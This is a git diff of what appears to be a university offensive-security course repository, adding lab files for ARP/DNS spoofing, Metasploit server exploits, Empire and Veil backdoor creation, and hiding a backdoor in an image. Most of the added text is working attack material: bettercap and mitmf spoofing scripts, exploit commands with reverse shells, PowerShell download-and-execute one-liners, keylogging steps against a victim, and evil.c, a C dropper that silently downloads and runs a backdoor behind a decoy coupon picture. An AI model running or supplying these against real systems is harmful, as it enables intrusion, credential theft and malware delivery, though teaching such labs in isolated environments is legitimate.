diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx index e88ad25..6068336 100644 Binary files a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx differ diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx new file mode 100644 index 0000000..5f98645 Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx differ diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip new file mode 100644 index 0000000..a880453 Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip differ diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap new file mode 100644 index 0000000..e62c56f --- /dev/null +++ b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap @@ -0,0 +1,6 @@ +net.probe on +set arp.spoof.fullduplex true +set arp.spoof.targets 10.0.2.13 +arp.spoof on +set net.sniff.local true +net.sniff on diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx new file mode 100644 index 0000000..1366957 Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx differ diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx new file mode 100644 index 0000000..1366957 Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx differ diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx new file mode 100644 index 0000000..0e87e51 Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx differ diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap new file mode 100644 index 0000000..b9fe88d --- /dev/null +++ b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap @@ -0,0 +1,5 @@ +net.probe on +set arp.spoof.fullduplex true +set arp.spoof.targets 10.0.2.13 +arp.spoof on +net.sniff on diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx new file mode 100644 index 0000000..1366957 Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx differ diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx new file mode 100644 index 0000000..1366957 Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx differ diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/DNS_mitmf_tool_lab.pptx similarity index 100% rename from FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx rename to FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/DNS_mitmf_tool_lab.pptx diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/commands.TXT b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/commands.TXT similarity index 100% rename from FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/commands.TXT rename to FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/commands.TXT diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx new file mode 100644 index 0000000..e13ef28 Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx differ diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT new file mode 100644 index 0000000..878bc45 --- /dev/null +++ b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT @@ -0,0 +1,3 @@ +https://information.rapid7.com/download-metasploitable-2017.html + +poweroff \ No newline at end of file diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT new file mode 100644 index 0000000..5ce4b59 --- /dev/null +++ b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT @@ -0,0 +1,14 @@ +arp -a //router's ip + +//install mitmf +apt-get update +apt-get install mitmf -y + +//attack +mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 +mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 --screen +//-hsts + +//Website +http://www.stealmylogin.com/demo.html +http://w3schools.invisionzone.com/ \ No newline at end of file diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx new file mode 100644 index 0000000..4bc47f0 Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx differ diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx new file mode 100644 index 0000000..1366957 Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx differ diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT new file mode 100644 index 0000000..5a3b0da --- /dev/null +++ b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT @@ -0,0 +1,7 @@ +use exploit/unix/ftp/vsftpd_234_backdoor +show options +set RHOST 10.0.2.12 +exploit + +iptables -I INPUT -p tcp --dport 21 --syn -j LOG --log-prefix "TCP_SYN" +grep -i "TCP_SYN" syslog diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx new file mode 100644 index 0000000..bf0e1c2 Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx differ diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx new file mode 100644 index 0000000..d25be47 Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx differ diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT new file mode 100644 index 0000000..359d3cd --- /dev/null +++ b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT @@ -0,0 +1,12 @@ +https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script +msfconsole +use exploit/multi/samba/usermap_script +set RHOST 10.0.2.12 //set the target IP +set RPORT 139 //set the target port + +set PAYLOAD cmd/unix/reverse_netcat + +set LHOST 10.0.2.10 //set the attaker IP +set LPORT 2222 //set the attaker port + +exploit \ No newline at end of file diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx new file mode 100644 index 0000000..008703c Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt new file mode 100644 index 0000000..2b1da64 --- /dev/null +++ b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt @@ -0,0 +1,42 @@ +mkdir /var/www/html/empire_backdoor/ +mkdir empire_lab +cd empire_lab +git clone https://github.com/EmpireProject/Empire.git +cd Empire/setup +./install.sh +cd ..exit +./empire + +//create a listener +listeners +(optional) uselistener back +uselistener http +(optional) info +set Port 8081 +set Host http:://10.0.2.10:8081 +execute +back +list //list listener + + +//create a backdoor for Windows, we need to know how to communicate with Windows Powershell securly (stager) +back //back to top level +//(optional): usestager +usestager windows/launcher_bat +set Listener http +set OutFile /var/www/html/empire_backdoor/emipire_http_8081.bat +execute + + +Victim download the backdoor payload from the website (Window machine) +service apache2 start (Kali start the website) +(Window 10: open IE) +10.0.2.7/empire_backdoor +(click the rev_https_8080.exe and run anyway) + +//Access to victim's computer +agents +interact +sysinfo + + diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx new file mode 100644 index 0000000..914b783 Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip new file mode 100644 index 0000000..a7a5641 Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt new file mode 100644 index 0000000..bfd0dbd --- /dev/null +++ b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt @@ -0,0 +1,110 @@ +Using veil-framework to Create a Backdoor + +1. Introduction +Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions. + +Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers +and is extended over the network at runtime. +It communicates over the stager socket and provides a comprehensive client-side Ruby API. +It features command history, tab completion, channels, and more. +Metepreter was originally written by skape for Metasploit 2.x, +common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. + +Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework + +Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection. + +2. Check environment setting up. My Window IP: 10.0.2.8 +ipconfig + +b. in Kali (Password: toor). My Kali IP: 10.0.2.7 +ifconfig + +3. Install Veil in Kali. You need to open a Kail Terminator +mkdir opt +cd opt +git clone https://github.com/Veil-Framework/Veil.git +cd Veil +cd config +./setup.sh --force --silent (enter "y" if asks) +(close the console) + +4. Attacker set payload options using Veil +(open the console) +cd /opt/Veil +./Veil.py (you should see the Veil interface now) +list (for two tools) +use 1 (using Evasion tool) +list (list all payloads) +use 15 (go/meterpreter/rev_https.py) +set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, avoid anti-virus program, sometime anti-virus scans the port) +set PROCESSORS 1 (make backdoor process 1) +set SLEEP 6 +options (see changed parameters) + +5. Attacker uses Veil to generate backdoor payload (executable) +generate (you should see interface) +rev_https_8080 (backdoor name to remember easily) +(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe) +(optional: https://nodistribute.com/ to check if the backdoor will be detected) +(close the console/Terminator) + +6. Attacker load the backdoor to website (On attacker's machine/Kali) +(open a file folder) +/ (allow you to type path) +/var/www/html +(create a folder evil-files) +(control-N to open another file window) +/usr/share/veil-output/compiled/ (you will see the backdoor file) +(copy the .exe file to evil-files folder) +(open Terminator) +service apache2 start (start the website) + +7. Attacker listening incoming connection (Sever/Attacker side/Kali) +(open another Terminator or split current Terminator) +msfconsole (you should see interface) +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https (I will listen to the malicouse payload/program) +show options (see all parameters for the payload) +set LHOST 10.0.2.7 (this IP is my attack machine, I am waiting, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, the same setting) +show options (see all parameters for the payload) +exploit (Now attacker is listening) + +8. Victim download the backdoor payload from the website (Window machine) +(open IE) +10.0.2.7/evil-files +(click the rev_https_8080.exe and run anyway) + +9. Access to victim’s machine +(enter, you will see msg promote again) +sessions -i +sessions -i 1 +sysinfo +ps +keyscan_start (enable key logger) +(in Window VM, open facebook, type your password) +keyscan_dump (what did you see?) +keyscan_stop +screenshot (what did you see) +(you will see victim connects to the attacker) +(restore snapshot) + + + + + + + + + + + +Reference +https://www.udemy.com/learn-social-engineering-from-scratch/ +https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/ +https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ +https://www.youtube.com/watch?v=W1rCVyGwKQ4 + + diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx new file mode 100644 index 0000000..4e46cb7 Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip new file mode 100644 index 0000000..178bfae Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx new file mode 100644 index 0000000..7a34029 Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx new file mode 100644 index 0000000..a9711bb Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx differ diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT new file mode 100644 index 0000000..457b42a --- /dev/null +++ b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT @@ -0,0 +1,77 @@ +https://www.dropbox.com/s/snby65gmwh92esj/amazon_coupon_code_Vl8_icon.ico +https://www.dropbox.com/s/gxh0ickzpr34t4o/amazon-coupon-code.jpg +https://www.dropbox.com/s/b01iqpmb9vfslrp/autoit-download-and-execute.au3 +https://www.dropbox.com/s/03cvti4wgu0dx0l/rev_https_8080.zip + +ls /root/.set/reports/powershell/ +mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt + +mv evil.exe /var/www/html/backdoor_image + +use multi/handler +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 10.0.2.10 +set LPORT 8080 +exploit + + + + + + + + + + +Other useful commands + +powershell (new-object System.Net.WebClient).DownloadFile('http://www.xys.org/buttons/xys_cover.gif','C:\Users\IEUser\cover.gif') + +https://www.linkedin.com/pulse/go-hell-powershell-powerdown-attacks-kirtar-oza-cissp-cisa-ms-/ + +https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf + + powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\" + +"powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\"" + +powershell.exe "IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))" + +gcc evil_image.c -o evil_image.exe + + +char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe"; + +#include +#include +#include +int main() +{ +char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe"; +char url[200]=""; +char shellCMD[400]=""; +printf("URL of a backdoor: "); +//gets(str); + +strcat(url,"'"); +strcat(url,str); +strcat(url,"'"); + +printf(url); +printf("\n"); + +char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile("; +strcat(shellCMD,shellCMD_head); +strcat(shellCMD,url); +strcat(shellCMD,",\'C:\\Users\\Public\\screenshot.exe\')"); + +printf(shellCMD); +getchar(); + + +//system("powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\""); +//system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(url, 'C:\\Users\\Public\\screenshot.exe') "); +system(shellCMD); +system("powershell.exe start C:\\Users\\Public\\screenshot.exe"); +return 0; +} \ No newline at end of file diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c new file mode 100644 index 0000000..60449c8 --- /dev/null +++ b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c @@ -0,0 +1,101 @@ +#include +#include +#include + +/* +system("powershell.exe \"IEX( (new-object net.webclient).downloadstring +('http://10.0.2.10/payload.txt'))\""); +system("powershell.exe -w hidden -c (new-object System.Net.WebClient). +Downloadfile('http://10.0.2.10/payload.txt', 'C:\\Users\\Public\\screenshot.exe') "); +system("powershell.exe start C:\\Users\\Public\\backdoor.exe"); +system("powershell.exe start C:\\Users\\Public\\coupon.jpg"); +*/ + +void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc); +void powershellcmdRun(char * shellCMDRun, char * outputLoc); +char* insert_char_realloc (char *str, int len); + +int main() +{ + + +//You need to make changes here +char url_evil[200]="http://10.0.2.10/rev_https_8080.exe"; +char url_image[200]="http://10.0.2.10/amazon-coupon-code.jpg"; +//char url_evil[200]="https://pbs.twimg.com/profile_images/1057899591708753921/PSpUS-Hp_400x400.jpg"; //for test +//char url_image[200]="https://pbs.twimg.com/profile_images/54789364/JPG-logo-highres_400x400.jpg"; //for testing +char backdoorLoc[200]="C:\\Users\\Public\\backdoor.exe"; +char outputLoc_image[200]="C:\\Users\\Public\\coupon.jpg"; + + + +// ==================download backdoor +char shellCMD[400]=""; +powershellDownloadCmd(url_evil, shellCMD, backdoorLoc); +//printf("URL: %s\n", shellCMD); +system(shellCMD); + +//================== download image +char shellCMD_image[400]=""; +powershellDownloadCmd(url_image, shellCMD_image, outputLoc_image); +//printf("URL: %s\n", shellCMD_image); +system(shellCMD_image); + +//=============execute backdoor +char shellCMDRun[400]=""; +powershellcmdRun(shellCMDRun, insert_char_realloc (backdoorLoc, strlen(backdoorLoc))); +//printf("command: %s\n", shellCMDRun); +system(shellCMDRun); + +//=============open an image +char shellCMDRun_image[400]=""; +powershellcmdRun(shellCMDRun_image, insert_char_realloc (outputLoc_image, strlen(outputLoc_image))); +//printf("command: %s\n", shellCMDRun_image); +system(shellCMDRun_image); + +return 0; +} + +/* function returning a powershell command */ +void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc){ + char url_with_quote[200]=""; + strcat(url_with_quote,"'"); + strcat(url_with_quote,url); + strcat(url_with_quote,"'"); + + char loc_with_quote[200]=""; + strcat(loc_with_quote,",\'"); + strcat(loc_with_quote,outputLoc); + strcat(loc_with_quote,"\')"); + + + char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile("; + strcat(shellCMD,shellCMD_head); + strcat(shellCMD,url_with_quote); + strcat(shellCMD,loc_with_quote); +} + + +void powershellcmdRun(char * shellCMDRun, char * outputLoc){ + char shellCMD_head[400]="\"powershell.exe start "; + strcat(shellCMDRun,shellCMD_head); + strcat(shellCMDRun,outputLoc); + strcat(shellCMDRun,"\""); +} + +char* insert_char_realloc (char *str, int len){ +int i; +int j=0; +char * str_temp = (char *)malloc(len + 10); +for (i=0;i